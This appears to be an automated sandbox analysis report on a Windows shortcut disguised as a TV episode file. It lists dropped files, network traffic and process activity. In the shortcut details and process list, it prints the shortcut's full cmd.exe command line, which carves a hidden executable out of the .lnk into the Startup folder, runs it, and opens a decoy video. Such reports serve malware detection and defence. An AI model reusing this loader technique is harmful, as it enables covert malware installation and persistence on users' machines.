                                            Entropy (8bit):4.858868896394348
                                            Encrypted:false
                                            SSDEEP:6:e28IqUHeE7PnC8vPNhy5mOJmy9EGmNrDnb:eCznv3OJb9FsrDnb
                                            MD5:A9917DA246D5EAB286DCD16116AC0F55
                                            SHA1:D6138FCFF6AD5046C0D86A5FBFCF167B1AAB0471
                                            SHA-256:98B5B607268C68B586973DC8D6F12B00923F194A3E00EFBBF620B0C57B8C171D
                                            SHA-512:4A1D4EB13224ED705F3788E6A22C6EAA02A921636821E32CE612EC0B8C213BBDF6FBF8037F3E5B74A8DDBCF8B7A074704AFA943F16DF28AC47D27DE198215944
                                            Malicious:false
                                            Preview:<SRPData version="1" sessionId="1"><Outcomes><Outcome id="videoCompleted" timesOccurred="0" /></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="26" monthOfLastLaunch="2" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):264
                                            Entropy (8bit):4.858868896394348
                                            Encrypted:false
                                            SSDEEP:6:e28IqUHeE7PnC8vPNhy5mOJmy9EGmNrDnb:eCznv3OJb9FsrDnb
                                            MD5:A9917DA246D5EAB286DCD16116AC0F55
                                            SHA1:D6138FCFF6AD5046C0D86A5FBFCF167B1AAB0471
                                            SHA-256:98B5B607268C68B586973DC8D6F12B00923F194A3E00EFBBF620B0C57B8C171D
                                            SHA-512:4A1D4EB13224ED705F3788E6A22C6EAA02A921636821E32CE612EC0B8C213BBDF6FBF8037F3E5B74A8DDBCF8B7A074704AFA943F16DF28AC47D27DE198215944
                                            Malicious:false
                                            Preview:<SRPData version="1" sessionId="1"><Outcomes><Outcome id="videoCompleted" timesOccurred="0" /></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="26" monthOfLastLaunch="2" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):164
                                            Entropy (8bit):4.876294438813235
                                            Encrypted:false
                                            SSDEEP:3:YTyLSMCrc9pHPOc8c8fI2SUEmAAM3gJAXbiJLLLig3UMHcRycpSn:YWLSrcTHF8+2FdAA8riJLXig3dcRycw
                                            MD5:9FB4B8F544665CF8BE5B2450D05AE0DA
                                            SHA1:9F9B48784328F0AE066F8791BECF3311DDDABF7B
                                            SHA-256:8FE9B9AD175E9F551AF63F7F55D42219AC16BE4A6CF924135928C8D38714A49E
                                            SHA-512:EF438B0E96A4EEAB257D7111020E895F11F16E2B3B3DD48870EE46C88029A57C159472969B30DE39C4FD2D6CAB8AD184ABAEA102813CEFC50D6C8FCBE94C6B24
                                            Malicious:false
                                            Preview:{"version":"10.19071.19011.0","backstack":[{"type":"MS.Entertainment.Video.MyVideoGalleryPage","transition":0,"link":"mswindowsvideo://location/?id=videoLibrary"}]}
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):164
                                            Entropy (8bit):4.876294438813235
                                            Encrypted:false
                                            SSDEEP:3:YTyLSMCrc9pHPOc8c8fI2SUEmAAM3gJAXbiJLLLig3UMHcRycpSn:YWLSrcTHF8+2FdAA8riJLXig3dcRycw
                                            MD5:9FB4B8F544665CF8BE5B2450D05AE0DA
                                            SHA1:9F9B48784328F0AE066F8791BECF3311DDDABF7B
                                            SHA-256:8FE9B9AD175E9F551AF63F7F55D42219AC16BE4A6CF924135928C8D38714A49E
                                            SHA-512:EF438B0E96A4EEAB257D7111020E895F11F16E2B3B3DD48870EE46C88029A57C159472969B30DE39C4FD2D6CAB8AD184ABAEA102813CEFC50D6C8FCBE94C6B24
                                            Malicious:false
                                            Preview:{"version":"10.19071.19011.0","backstack":[{"type":"MS.Entertainment.Video.MyVideoGalleryPage","transition":0,"link":"mswindowsvideo://location/?id=videoLibrary"}]}
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):1.8988267306283253
                                            Encrypted:false
                                            SSDEEP:96:eJQAbswv2TDdyEbvZ45/FBMc5P53svgzfj32n0CE/sskKzoCBRfZ:OQAbsw2lbvOz5P5/zU0CE/sbGoCBX
                                            MD5:828235AC18063EF3F531293AE69C34E8
                                            SHA1:423AA9C6A3A0A4BBB7397BBEC84C139F295BBD20
                                            SHA-256:54352EF352360A56B227BBE29E2949AB1CD5644A85FCFA11F10368C1DA6BA2B6
                                            SHA-512:8E1E24FB3FE1EEDA7A465C23121D78407EA189EDDC45716BF088C82BDF7484AF3E49C2C61C06E7DB108154A9EFABF2811711EC9A46E0B4E43F403ED95950D46F
                                            Malicious:false
                                            Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.R.................................................................................................................................................................................................................................................................................................................................................../.e........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):2.4302594552986294
                                            Encrypted:false
                                            SSDEEP:96:YJQKbswv2TDdyEbvZ45/FBMc5P53svgzfj32n0CE/sskKzoCBRfZ:8QKbsw2lbvOz5P5/zU0CE/sbGoCBX
                                            MD5:93AA7D05E916EF9C836081EAC398E4CF
                                            SHA1:EA5DA192F70A8734E877C83C0DF97CB7A2DE12B9
                                            SHA-256:15B812C08EA72470358B6E1A876AF2FE6AC693857B65EC042224A5FD0C24151D
                                            SHA-512:5395C554185F74775F16369A4C4F46F35C7913855602F5FCF33DB0C218D6F24457B53771E4CC6E90D499BAB98ED386E136981D3A8B9FA74814CC2D864CC30BD4
                                            Malicious:false
                                            Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm.R.................................................................................................................................................................................................................................................................................................................................................../.eHvLE............. ......3a..|....W....`...... ..hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk ..J.....................................h...............................Configuration...p...sk..x...x.......t.......H...X.............4.........?.......................
                                            Process:C:\Windows\System32\cmd.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2
                                            Entropy (8bit):1.0
                                            Encrypted:false
                                            SSDEEP:3:y:y
                                            MD5:81051BCC2CF1BEDF378224B0A93E2877
                                            SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                            SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                            SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                            Malicious:false
                                            Preview:..
                                            Process:C:\Windows\System32\cmd.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.309909808883306
                                            Encrypted:false
                                            SSDEEP:6144:jaw8CE/ZeaJFSSP0Y6B0CvpuIUOa4+e9gFbJUjWKdHjj5+sJ1bREf4J59:j/8zWvp63qtdHHveA3
                                            MD5:CE0929E6216D5CA95490A2C6BB04FF91
                                            SHA1:46298134803AD8A9BC839792E61B049FA27CAE88
                                            SHA-256:3FD2B84BCD8CCF459F9540A89E06C83A0D8A614429EA4280E24D327742062310
                                            SHA-512:ABD58C75CFB7E2FFA17EA1586577477E2532A5AA1984E9D35D0D4F7192968EDA7410ED02C090ECCC1E4F0621F0A7C2985E1797B2A58273F3EC6DC5390A09A8B1
                                            Malicious:false
                                            Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...................................................................................................................................................................................................................................................................................................................................................o...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\findstr.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):75
                                            Entropy (8bit):5.181761023656138
                                            Encrypted:false
                                            SSDEEP:3:3cE/VVALqxVRQn9QmW5KuPUyn:39/RVkIKuPpn
                                            MD5:05FEF96C01C2FD416CB32D2E009A80C8
                                            SHA1:081F1FEF027DAF66D9E7F38D9ADAD450B0CA296B
                                            SHA-256:E859B5C9DF04101145F25FCCEC3D447C80C1A115547D54975C1CD97A353245A7
                                            SHA-512:2DC1A6B22E6AED7CCCD0BE030B403851AA5B30A1CBCF2297C45533B0EF21142DADF669846D623A25D60736E340813838EA647EE311A4A16372433E3D2EE37DC2
                                            Malicious:false
                                            Preview:FINDSTR: Cannot open Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk..
                                            File type:MS Windows shortcut, Item id list present, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                            Entropy (8bit):2.566791905206311
                                            TrID:
                                            • Windows Shortcut (20020/1) 100.00%
                                            File name:liar.lnk
                                            File size:1'984 bytes
                                            MD5:dda82d18bb435162cfa8d956b57e63bb
                                            SHA1:93705e71ceddce5c380d5275c7648af7a76b7bcd
                                            SHA256:456ddb67b8b717eeb5345cbeb1f3564e1bacfbdd9a683fe45d734ba0d0ca3b60
                                            SHA512:5437d0b59104f61fd06a772c5b1b8db43db9f28ab5af4d207d09a9bd66f78651a4bb311d766ecc0fa2324ee4c6f205e018990ea5e38688bccb423fc08f0aa5d0
                                            SSDEEP:24:8AFpQQJi2WbOjCyOiMWg80hzxSvBp2fL2WbcVmO1BaF:8AFGkCyOiMWg86zAvBp2jtOm
                                            TLSH:00419E145FC40625E373DDB648E5D3068827B81AEA119E6901A4C95F3571403FF25F39
                                            File Content Preview:L..................F........................................................)....P.O. .:i.....+00.../C:\...................R.1...........Windows.<...............*.........................W.i.n.d.o.w.s.....V.1...........System32..>...............*.........
                                            Icon Hash:74f0dcc4ccc9e1ed

                                            General

                                            Relative Path:
                                            Command Line Argument:/v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="%Appdata%\Microsoft\Windows\Start Menu\Programs\startup\%USERNAME%.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD %TMP%&Echo.>!I!&start !I!
                                            Icon location:.\Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv

                                            Download Network PCAP: filteredfull

                                            • Total Packets: 12
                                            • 443 (HTTPS)
                                            • 53 (DNS)
                                            TimestampSource PortDest PortSource IPDest IP
                                            Feb 26, 2025 07:59:28.265719891 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.265747070 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:28.265819073 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.269613981 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.269633055 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:28.891520023 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:28.891587973 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.957192898 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.957221985 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:28.957415104 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:28.957535982 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:28.957653999 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:29.003331900 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:29.141853094 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:29.141872883 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:29.141921043 CET4434975023.219.148.9192.168.2.16
                                            Feb 26, 2025 07:59:29.141922951 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:29.141953945 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:29.141973972 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:29.147506952 CET49750443192.168.2.1623.219.148.9
                                            Feb 26, 2025 07:59:29.147526026 CET4434975023.219.148.9192.168.2.16
                                            TimestampSource PortDest PortSource IPDest IP
                                            Feb 26, 2025 07:59:28.256304026 CET5510753192.168.2.161.1.1.1
                                            Feb 26, 2025 07:59:28.263835907 CET53551071.1.1.1192.168.2.16
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Feb 26, 2025 07:59:28.256304026 CET192.168.2.161.1.1.10x74b1Standard query (0)settings-ssl.xboxlive.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Feb 26, 2025 07:59:28.263835907 CET1.1.1.1192.168.2.160x74b1No error (0)settings-ssl.xboxlive.comsettings-ssl.xboxlive.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                            Feb 26, 2025 07:59:28.263835907 CET1.1.1.1192.168.2.160x74b1No error (0)settings-ssl.xboxlive.com.edgekey.nete87.dspb.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                            Feb 26, 2025 07:59:28.263835907 CET1.1.1.1192.168.2.160x74b1No error (0)e87.dspb.akamaiedge.net23.219.148.9A (IP address)IN (0x0001)false
                                            Feb 26, 2025 07:59:29.728130102 CET1.1.1.1192.168.2.160x2cf0No error (0)ep-afd-activation-cubaf8a6apchfsg5.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                            Feb 26, 2025 07:59:29.728130102 CET1.1.1.1192.168.2.160x2cf0No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Feb 26, 2025 07:59:29.728130102 CET1.1.1.1192.168.2.160x2cf0No error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Feb 26, 2025 07:59:29.728130102 CET1.1.1.1192.168.2.160x2cf0No error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                            • settings-ssl.xboxlive.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.164975023.219.148.94436968C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            TimestampBytes transferredDirectionData
                                            2025-02-26 06:59:28 UTC216OUTGET /XBLWinClient/v10_video/configuration.xml HTTP/1.1
                                            Accept: */*
                                            User-Agent: XBLWIN10.19071
                                            Accept-Language: en-CH
                                            Accept-Encoding: gzip, deflate, br
                                            Host: settings-ssl.xboxlive.com
                                            Connection: Keep-Alive
                                            2025-02-26 06:59:29 UTC249INHTTP/1.1 200 OK
                                            Cache-Control: public, max-age=3600
                                            Content-Type: text/xml
                                            X-Content-Type-Options: nosniff
                                            X-XblCorrelationId: 0a21ddad-b02f-492d-b8c0-11d6ac611bde
                                            Date: Wed, 26 Feb 2025 06:59:29 GMT
                                            Content-Length: 1520
                                            Connection: close
                                            2025-02-26 06:59:29 UTC1520INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6c 69 65 6e 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 58 62 6c 57 69 6e 43 6c 69 65 6e 74 2f 32 30 31 32 2f 30 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 22 3e 0d 0a 20 20 20 20 3c 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 3e 58 62 6c 57 69 6e 43 6c 69 65 6e 74 3c 2f 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 20 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 72 69 67 68 74 73 3e 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1"> <targetedClient>XblWinClient</targetedClient > <rights>Copyright (c) Microsoft C


                                            050100s020406080100

                                            Click to jump to process

                                            050100s0.0050100MB

                                            Click to jump to process

                                            Target ID:1
                                            Start time:01:59:06
                                            Start date:26/02/2025
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\Cmd.exe" /v:On/CSET I=Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv&SET w="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\user.exe"&(if not exist !w! Findstr/v "System32 Rj%TIME:~7,1%%TIME:~-2%" !I!.Lnk>!w!&start "" !w!)&CD C:\Users\user\AppData\Local\Temp&Echo.>!I!&start !I!
                                            Imagebase:0x7ff6fd780000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                            Target ID:2
                                            Start time:01:59:06
                                            Start date:26/02/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6684c0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:01:59:06
                                            Start date:26/02/2025
                                            Path:C:\Windows\System32\findstr.exe
                                            Wow64 process (32bit):false
                                            Commandline:Findstr /v "System32 Rj672" Reacher.S03E04.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk
                                            Imagebase:0x7ff6e78c0000
                                            File size:36'352 bytes
                                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:01:59:16
                                            Start date:26/02/2025
                                            Path:C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
                                            Imagebase:0x7ff7750b0000
                                            File size:25'966'080 bytes
                                            MD5 hash:FE340ECB1D09B5BAA66DFE25AF11654F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                            Executed Functions

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1503970313.000001D1E2E30000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D1E2E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1d1e2e30000_Video.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe7fef7a75a044fe95ad06d229b801c63ae55c36ff6289ce6f28fabb1129bc91
                                            • Instruction ID: 4b8c685bbfcb63592b1617a49d56ee31d04d983df6f615252d05243031cc3ff3
                                            • Opcode Fuzzy Hash: fe7fef7a75a044fe95ad06d229b801c63ae55c36ff6289ce6f28fabb1129bc91
                                            • Instruction Fuzzy Hash: 33B19D31618E1C9FDB6AEF58D891BE973E1FB65311F04026AC80AD7295DF34E9098BC1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1503970313.000001D1E2E30000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D1E2E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1d1e2e30000_Video.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b8e173f8b3b561d006d18f7ac28b6e242acec2c262676eed071ddcbeb69a9a8
                                            • Instruction ID: 965718b6ac7430e8a37948f9c9cfad81f4683319fbb9864caaa4c0bb9936c8df
                                            • Opcode Fuzzy Hash: 1b8e173f8b3b561d006d18f7ac28b6e242acec2c262676eed071ddcbeb69a9a8
                                            • Instruction Fuzzy Hash: 44215E31B4CB1C9FEB56DE98E4857ED73E1EB64311F10026BD809E3252DA7598468781
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1503970313.000001D1E2E30000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D1E2E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1d1e2e30000_Video.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9196d669f6b4cf98715258e37cbe8a97c7b52d1c67ad49fedc781b917e9b8109
                                            • Instruction ID: ef95550367c11d8356173cbfef8856a9cbe8d4d4ae377741ae7f60266eb3b482
                                            • Opcode Fuzzy Hash: 9196d669f6b4cf98715258e37cbe8a97c7b52d1c67ad49fedc781b917e9b8109
                                            • Instruction Fuzzy Hash: 8DF0E53230DA5C4FE30A8A5CFC422F933D1D346371B0441ABD406C3652D926D9075341